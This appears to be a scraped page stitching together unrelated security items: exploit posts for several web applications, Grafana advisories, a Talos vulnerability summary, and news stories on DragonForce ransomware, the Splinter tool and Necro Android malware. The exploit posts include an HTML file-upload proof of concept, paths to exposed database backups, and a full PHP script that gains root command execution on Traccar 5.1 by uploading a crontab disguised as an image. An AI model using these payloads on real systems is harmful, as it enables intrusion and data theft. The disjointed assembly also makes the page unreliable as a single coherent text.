Online Flight Booking System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================================================  
| # Title     : Online Flight Booking System 1.0 Remot File Upload vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                                                            |  
| # Vendor    : https://www.campcodes.com/downloads/online-flight-booking-management-system-source-code/?wpdmdl=5913&refresh=66bbf742d7abc1723594562                        |  
=============================================================================================================================================================================

[+] POC :

[+] The following html code uploads a executable malicious file remotely .

   [+] Line 28 : Set your Target.

[+] save payload as poc.html

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>RFU</title>  
</head>  
<body>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/Online_Flight_Booking_Management_System/admin/ajax.php?action=save_settings", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

[+] Path : http://127.0.0.1/Online_Flight_Booking_Management_System/assets/img

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Online Flight Booking System 1.0 Arbitrary File Upload

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

**Multi Branch School Management System 3.5 Backup Disclosure**

Posted Sep 25, 2024

Authored by indoushka

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

tags | exploit, info disclosure

SHA-256 | b4c3fb3408f8d7a80baf2b5ec0b035520c60a8b287134c61abe01863834639ea

Download | Favorite | View

**Multi Branch School Management System 3.5 Backup Disclosure**

    =============================================================================================================================================| # Title     : Multi Branch School Management System 3.5 Backup Disclosure Vulnerability                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://school.ramomcoder.com/                                                                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Appears to leave backups in a world accessible directory under the document root.  [+] use Payload : /uploads/db_backup/[+] http://127.0.0.1/Multi/uploads/db_backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,950)
*   Arbitrary (17,099)
*   BBS (2,859)
*   Bypass (1,925)
*   CGI (1,047)
*   Code Execution (7,919)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,431)
*   DoS (25,293)
*   Encryption (2,395)
*   Exploit (54,302)
*   File Inclusion (4,275)
*   File Upload (1,020)
*   Firewall (822)
*   Info Disclosure (2,922)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,304)
*   Local (14,858)
*   Magazine (587)
*   Overflow (13,225)
*   Perl (1,435)
*   PHP (5,281)
*   Proof of Concept (2,412)
*   Protocol (3,749)
*   Python (1,661)
*   Remote (31,903)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,658)
*   Security Tool (8,050)
*   Shell (3,306)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,731)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,121)
*   Web (10,143)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,304)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,125)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,592)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,327)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,893)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,867)
*   UNIX (9,458)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Multi Branch School Management System 3.5 Backup Disclosure

Complete Multi Hospital Management System version 1.0 suffers from a backup disclosure vulnerability.

**Complete Multi Hospital Management System 1.0 Backup Disclosure**

Posted Sep 25, 2024

Authored by indoushka

Complete Multi Hospital Management System version 1.0 suffers from a backup disclosure vulnerability.

tags | exploit, info disclosure

SHA-256 | e760cf3c5b44d7d8984817fcf92204fd9912a026b5d02720406cc72f12ac70ed

Download | Favorite | View

**Complete Multi Hospital Management System 1.0 Backup Disclosure**

    =============================================================================================================================================| # Title     : Complete Multi Hospital Management System 1.0 Backup Disclosure Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/free-download-complete-multi-hospital-management-system/                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Appears to leave backups in a world accessible directory under the document root.  [+] use Payload : /files/backups/[+] http://127.0.0.1/multihospital/files/backups/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,950)
*   Arbitrary (17,099)
*   BBS (2,859)
*   Bypass (1,925)
*   CGI (1,047)
*   Code Execution (7,919)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,431)
*   DoS (25,293)
*   Encryption (2,395)
*   Exploit (54,302)
*   File Inclusion (4,275)
*   File Upload (1,020)
*   Firewall (822)
*   Info Disclosure (2,922)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,304)
*   Local (14,858)
*   Magazine (587)
*   Overflow (13,225)
*   Perl (1,435)
*   PHP (5,281)
*   Proof of Concept (2,412)
*   Protocol (3,749)
*   Python (1,661)
*   Remote (31,903)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,658)
*   Security Tool (8,050)
*   Shell (3,306)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,731)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,121)
*   Web (10,143)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,304)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,125)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,592)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,327)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,893)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,867)
*   UNIX (9,458)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Complete Multi Hospital Management System 1.0 Backup Disclosure

Traccar version 5.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Traccar 5.1 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.traccar.org/old-versions/                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP script assumes you're targeting a similar HTTP service that allows file uploads and interacting with REST APIs.[+] save payload as poc.php[+] usage : C:\www\test>php poc.php[+] Line 117 : login info : 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');[+] payload :<?phpclass TraccarExploit {    private $host;    private $port;    private $username;    private $password;    private $email;    private $target_uri;    public function __construct($host, $port = 8082, $username = '', $password = '', $email = '', $target_uri = '/') {        $this->host = $host;        $this->port = $port;        $this->username = $username;        $this->password = $password;        $this->email = $email;        $this->target_uri = $target_uri;    }    public function send_request($method, $uri, $data = null, $ctype = 'application/json') {        $url = "http://{$this->host}:{$this->port}{$uri}";        $headers = [            "Content-Type: {$ctype}",        ];        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function register_user() {        echo "Registering new user...\n";        $body = json_encode([            'name' => $this->username,            'email' => $this->email,            'password' => $this->password,            'totpKey' => null        ]);        $res = $this->send_request('POST', $this->target_uri . 'api/users', $body);        if (!$res || $res['code'] !== 200) {            die("Failed to register user. Response: " . print_r($res, true));        }        echo "User registered successfully.\n";    }    public function authenticate() {        echo "Authenticating...\n";        $data = http_build_query([            'email' => $this->email,            'password' => $this->password        ]);        $res = $this->send_request('POST', $this->target_uri . 'api/session', $data, 'application/x-www-form-urlencoded');        if (!$res || $res['code'] !== 200) {            die("Failed to authenticate. Response: " . print_r($res, true));        }        echo "Authenticated successfully.\n";    }    public function upload_cron_file($cmd) {        echo "Adding new device...\n";        $body = json_encode([            'name' => bin2hex(random_bytes(8)),            'uniqueId' => bin2hex(random_bytes(8))        ]);        $res = $this->send_request('POST', $this->target_uri . 'api/devices', $body);        if (!$res || $res['code'] !== 200) {            die("Failed to add device. Response: " . print_r($res, true));        }        $device_id = $res['id'];        $cron_job = "* * * * * root /bin/bash -c '{$cmd}'\n";        $cron_filename = bin2hex(random_bytes(6));        echo "Uploading crontab file...\n";        $file_data = [            'file' => curl_file_create("data://text/plain;base64," . base64_encode($cron_job), 'image/png', "{$cron_filename}.png")        ];        $this->send_request('POST', $this->target_uri . "api/devices/{$device_id}/image", $file_data, 'multipart/form-data');        echo "Cronjob file uploaded successfully. Waiting for execution...\n";    }    public function exploit($cmd) {        $this->register_user();        $this->authenticate();        $this->upload_cron_file($cmd);    }}// Usage example:$exploit = new TraccarExploit('127.0.0.1', 8082, 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');$exploit->exploit('id'); // Replace 'id' with your desired command to execute?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Traccar 5.1 Code Injection

Unquoted Search Path or Element vulnerability in Grafana Agent (Flow mode) on Windows allows Privilege Escalation from Local User to SYSTEM.
This issue affects Agent Flow before 0.43.3.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-m5gv-m5f9-wgv4: Grafana Agent (Flow mode) on Windows has Unquoted Search Path or Element vulnerability

Unquoted Search Path or Element vulnerability in Grafana Alloy on Windows allows Privilege Escalation from Local User to SYSTEM.
This issue affects Alloy: before 1.3.4, from 1.4.0-rc.0 and prior to 1.4.1.

GHSA-chqx-36rm-rf8h: Grafana Alloy on Windows has Unquoted Search Path or Element vulnerability

Talos researchers have disclosed three vulnerabilities in OpenPLC, a popular open-source programmable logic controller.

Wednesday, September 25, 2024 12:00

Cisco Talos’ Vulnerability Research team recently disclosed two vulnerabilities in Microsoft products that have been patched by the company over the past two Patch Tuesdays. 

One is a vulnerability in the High-Definition Audio Bus Driver in Windows systems that could lead to a denial of service, while the other is a memory corruption issue that exists in a multicasting protocol in Windows 10. 

Additionally, Talos researchers have disclosed three vulnerabilities in OpenPLC, a popular open-source programmable logic controller.  

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

**Microsoft High-Definition Audio Bus Driver denial-of-service vulnerability **

_Discovered by Marcin “Icewall” Noga._ 

TALOS-2024-2008 (CVE-2024-45383) is a vulnerability in the Microsoft HD Audio Bus Driver that could allow an attacker to cause a denial of service. 

The driver allows the Windows operating system to communicate with external audio devices that play sound, including those that are integrated into machines’ motherboards or connected via HD audio interfaces.  

A mishandling of IRP requests in the driver’s interface could allow an attacker to send multiple IRP Complete requests to the driver, causing the DoS and forcing the operating system into the “Blue Screen of Death.” 

**Stale memory dereference in Microsoft Pragmatic General Multicast Server **

_Discovered by a Cisco Talos researcher._ 

A memory corruption vulnerability exists in the Pragmatic General Multicast server in the Microsoft Windows 10 Kernel.  

The Pragmatic General Multicast protocol is an IP-based multicasting protocol that is implemented by Microsoft as part of the Message Queueing service available in different versions of Windows. 

A specially crafted network packet can lead to the access of stale memory structure, resulting in memory corruption. An attacker can send a sequence of malicious packets to trigger TALOS-2024-2062 (CVE-2024-38140). 

Talos independently discovered this issue and reported it to Microsoft prior to their patch release earlier this year. However, Microsoft informed us that an internal researcher had already discovered this issue. 

**Three vulnerabilities in OpenPLC **

_Discovered by Jared Rittle_.

Talos recently discovered three vulnerabilities in OpenPLC, an open-source programmable logic controller designed to provide a low-cost option for automation in many manufacturing and logistics settings. 

Two of the issues — TALOS-2024-2004 (CVE-2024-36980, CVE-2024-36981) and TALOS-2024-2016 (CVE-2024-39589, CVE-2024-39590) — can lead to a denial-of-service on the targeted device. An adversary could exploit these vulnerabilities by sending a series of specially crafted Ethernet/IP requests. 

Another stack-based buffer overflow vulnerability, TALOS-2024-2005 (CVE-2024-34026), can also be exploited in this way. However, in this case, it could lead to remote code execution.

Talos discovers denial-of-service vulnerability in Microsoft Audio Bus; Potential remote code execution in popular open-source PLC

DragonForce ransomware is expanding its RaaS operation and becoming a global cybersecurity threat against businesses. Companies must implement…

DragonForce ransomware is expanding its RaaS operation and becoming a global cybersecurity threat against businesses. Companies must implement strong cybersecurity strategies to defend against this growing ransomware attack and avoid becoming victims.

**Ransomware attacks** are growing, leaving organizations vulnerable to new and more sophisticated threats. According to Group-IB’s Hi-Tech Crime Trends 2023/2024 report, ransomware incidents could cause even greater damage in 2024.

One of the most significant emerging threats is the DragonForce ransomware group, which leverages a Ransomware-as-a-Service (**RaaS**) affiliate program, employing variants of well-known ransomware families to wreak havoc on targeted industries.

****DragonForce: A Dual-Ransomware Threat****

The DragonForce ransomware group emerged in August 2023, deploying a variant based on **LockBit 3.0**, a notorious ransomware strain. However, by July 2024, the group introduced a second variant, initially claimed to be their original creation but later found to be a fork of **ContiV3 ransomware**. These dual ransomware versions are used to exploit vulnerabilities in companies, particularly in sectors like manufacturing, real estate, and transportation.

Screenshot of the LockBit version of the DragonForce ransomware

DragonForce’s attack strategy revolves around double extortion—encrypting data and threatening to leak it unless a ransom is paid. This adds immense pressure on victims to comply, fearing not only operational disruption but also the reputational damage that could arise from exposed sensitive information.

****Advanced Tactics for Maximum Damage****

According to Group-IB’s research shared with Hackread.com ahead of publication on Wednesday, the DragonForce ransomware gang’s operations are highly customizable, allowing affiliates to configure attacks based on the type of victim.

With its RaaS affiliate program, launched on June 26, 2024, DragonForce ransomware offers attackers the ability to personalize ransomware payloads. Affiliates can disable security features, set encryption parameters, and even customize ransom notes. In return, affiliates receive 80% of any ransom collected.

DragonForce employs a variety of advanced techniques for evasion and persistence. One of their key tactics is “Bring Your Own Vulnerable Driver” (**BYOVD**), where affiliates use vulnerable drivers to disable security processes and evade detection. Additionally, they clear Windows Event Logs after encryption to hinder forensic investigations.

For lateral movement, the group uses tools like **Cobalt Strike** and **SystemBC**, both of which allow them to harvest credentials and persist in networks. They also use network scanning tools like SoftPerfect Network Scanner to map out networks, helping spread the ransomware to as many devices as possible.

****Targeted Attacks and Global Reach****

Between August 2023 and August 2024, DragonForce listed 82 victims on its **dark web** leak site. Most attacks were concentrated in the U.S. (52.4%), followed by the U.K. and Australia. The manufacturing sector suffered the highest number of attacks, with real estate and transportation industries close behind.

In addition to their use of ContiV3 and LockBit variants, DragonForce’s ability to adapt to new affiliate demands makes them a rapidly growing threat. By targeting high-revenue companies and critical sectors, they continue to increase their foothold in the cybercrime infrastructure.

****What Can Businesses Do?****

To combat these sophisticated attacks, businesses need to adopt more proactive and layered security measures. Here are some critical steps:

*   **Multi-Factor Authentication (MFA):** Adding additional authentication layers makes it harder for attackers to compromise credentials.
*   **Early Detection:** Use behavioural detection tools such as Endpoint Detection and Response (EDR) to identify suspicious activity early.
*   **Backup Strategy:** Regular backups reduce the impact of ransomware by ensuring data can be recovered without paying ransom.
*   **Patch Vulnerabilities:** Regularly patching known vulnerabilities prevents ransomware from exploiting outdated systems.
*   **Employee Training:** Training employees to recognize phishing and other malicious tactics can prevent initial infiltration.
*   **Avoid Paying the Ransom:** Paying ransom often leads to more attacks, as it signals vulnerability to other cybercriminals.

While DragonForce ransomware expands its RaaS operation, businesses must remain alert and implement proper cybersecurity strategies to avoid becoming victims of this and other dangerous threats.

1.  New Kransom Ransomware Disguised as Game
2.  $75 Million Ransom Paid to Dark Angels Ransomware Group
3.  Play Ransomware Variant Targeting Linux ESXi Environments
4.  PythonAnywhere Cloud Platform Abused for Hosting Ransomware
5.  Qilin Ransomware Upgrades – Now Steals Google Chrome Credentials

DragonForce Ransomware Expands RaaS, Targets Firms Worldwide

Cybersecurity researchers have flagged the discovery of a new post-exploitation red team tool called Splinter in the wild.
Palo Alto Networks Unit 42 shared its findings after it discovered the program on several customers' systems.
"It has a standard set of features commonly found in penetration testing tools and its developer created it using the Rust programming language," Unit 42's Dominik

Penetration Testing / Cyber Threat

Cybersecurity researchers have flagged the discovery of a new post-exploitation red team tool called **Splinter** in the wild.

Palo Alto Networks Unit 42 shared its findings after it discovered the program on several customers' systems.

"It has a standard set of features commonly found in penetration testing tools and its developer created it using the Rust programming language," Unit 42's Dominik Reichel said. "While Splinter is not as advanced as other well-known post-exploitation tools like Cobalt Strike, it still presents a potential threat to organizations if it is misused."

Penetration testing tools are often used for red team operations to flag potential security issues in a company's network. However, such adversary simulation tools can also be weaponized by threat actors to their advantage.

Unit 42 said it has not detected any threat actor activity associated with the Splinter tool set. There is no information as yet on who developed the tool.

Artifacts unearthed by the cybersecurity firm reveal that they are "exceptionally large," coming in around 7 MB, primarily owing to the presence of 61 Rust crates within it.

Splinter is no different than other post-exploitation frameworks in that it comes with a configuration that includes information about the command-and-control (C2) server, which is parsed in order to establish contact with the server using HTTPS.

"Splinter implants are controlled by a task-based model, which is common among post-exploitation frameworks," Reichel noted. "It obtains its tasks from the C2 server the attacker has defined."

Some of the functions of the tool include executing Windows commands, running modules via remote process injection, uploading and downloading files, collecting cloud service account info, and deleting itself from the system.

"The increasing variety underscores the importance of staying up to date on prevention and detection capabilities, since criminals are likely to adopt any techniques that are effective for compromising organizations," Reichel said.

The disclosure comes as Deep Instinct detailed two attack methods that could be exploited by threat actors to achieve stealthy code injection and privilege escalation by leveraging an RPC interface in Microsoft Office and a malicious shim, respectively.

"We applied a malicious shim in a process without registering an SDB file on the system," researchers Ron Ben-Yizhak and David Shandalov said. "We effectively bypassed EDR detection by writing to a child process and loading the target DLL from the suspended child process before any EDR hook can be established."

In July 2024, Check Point also shed light on a new process injection technique called Thread Name-Calling that allows to implant of a shellcode into a running process by abusing the API for thread descriptions while bypassing endpoint protection products.

"As new APIs are added to Windows, new ideas for injection techniques are appearing," security researcher Aleksandra "Hasherezade" Doniec said.

"Thread Name-Calling uses some of the relatively new APIs. However, it cannot avoid incorporating older well-known components, such as APC injections – APIs which should always be taken into consideration as a potential threat. Similarly, the manipulation of access rights within a remote process is a suspicious activity."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybersecurity Researchers Warn of New Rust-Based Splinter Post-Exploitation Tool

Altered versions of legitimate Android apps associated with Spotify, WhatsApp, and Minecraft have been used to deliver a new version of a known malware loader called Necro.
Kaspersky said some of the malicious apps have also been found on the Google Play Store. They have been cumulatively downloaded 11 million times. They include -

Wuta Camera - Nice Shot Always (com.benqu.wuta) - 10+ million

Mobile Security / Malware

Altered versions of legitimate Android apps associated with Spotify, WhatsApp, and Minecraft have been used to deliver a new version of a known malware loader called Necro.

Kaspersky said some of the malicious apps have also been found on the Google Play Store. They have been cumulatively downloaded 11 million times. They include -

*   Wuta Camera - Nice Shot Always (com.benqu.wuta) - 10+ million downloads
*   Max Browser-Private & Security (com.max.browser) - 1+ million downloads

As of writing, Max Browser is no longer available for download from the Play Store. Wuta Camera, on the other hand, has been updated (version 6.3.7.138) to remove the malware. The latest version of the app, 6.3.8.148, was released on September 8, 2024.

It's currently not clear how both the apps were compromised with the malware in the first place, although it's believed that a rogue software developer kit (SDK) for integrating advertising capabilities is the culprit.

Necro (not to be confused with a botnet of the same name) was first discovered by the Russian cybersecurity company in 2019 when it was hidden within a popular document scanning app called CamScanner.

CamScanner later blamed the issue on an advertisement SDK provided by a third-party named AdHub that it said contained a malicious module to retrieve next-stage malware from a remote server, essentially acting as a loader for all kinds of malware onto victim devices.

The new version of the malware is no different, although it packs in obfuscation techniques to evade detection, particularly leveraging steganography to hide payloads.

"The downloaded payloads, among other things, could display ads in invisible windows and interact with them, download and execute arbitrary DEX files, install applications it downloaded," Kaspersky researcher Dmitry Kalinin said.

It can also "open arbitrary links in invisible WebView windows and execute any JavaScript code in those, run a tunnel through the victim's device, and potentially subscribe to paid services."

One of the prominent delivery vehicles for Necro is modded versions of popular apps and games that are hosted on unofficial sites and app stores. Once downloaded, the apps initialize a module named Coral SDK, which, in turn, sends an HTTP POST request to a remote server.

The server subsequently responds with a link to a purported PNG image file hosted on adoss.spinsok\[.\]com, following which the SDK proceeds to extract the main payload – a Base64-encoded Java archive (JAR) file – from it.

Necro's malicious functions are realized through a set of additional modules (aka plugins) that are downloaded from the command-and-control (C2) server, allowing it to perform a wide range of actions on the infected Android device -

*   NProxy - Create a tunnel through the victim's device
*   island - Generate a pseudo-random number that's used as a time interval (in milliseconds) between displays of intrusive ads
*   web - Periodically contact a C2 server and execute arbitrary code with elevated permissions when loading specific links
*   Cube SDK - A helper module that loads other plugins to handle ads in the background
*   Tap - Download arbitrary JavaScript code and a WebView interface from the C2 server that are responsible for covertly loading and viewing ads
*   Happy SDK/Jar SDK - A module that combines NProxy and web modules with some minor differences

The discovery of Happy SDK has raised the possibility that the threat actors behind the campaign are experimenting with a non-modular version as well.

"This suggests that Necro is highly adaptable and can download different iterations of itself, perhaps to introduce new features," Kalinin said.

Telemetry data gathered by Kaspersky shows that it blocked over ten thousand Necro attacks worldwide between August 26 and September 15, 2024, with Russia, Brazil, Vietnam, Ecuador, Mexico, Taiwan, Spain, Malaysia, Italy, and Turkey accounting for the most number of attacks.

"This new version is a multi-stage loader that used steganography to hide the second-stage payload, a very rare technique for mobile malware, as well as obfuscation to evade detection," Kalinin said.

"The modular architecture gives the Trojan's creators a wide range of options for both mass and targeted delivery of loader updates or new malicious modules depending on the infected application."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows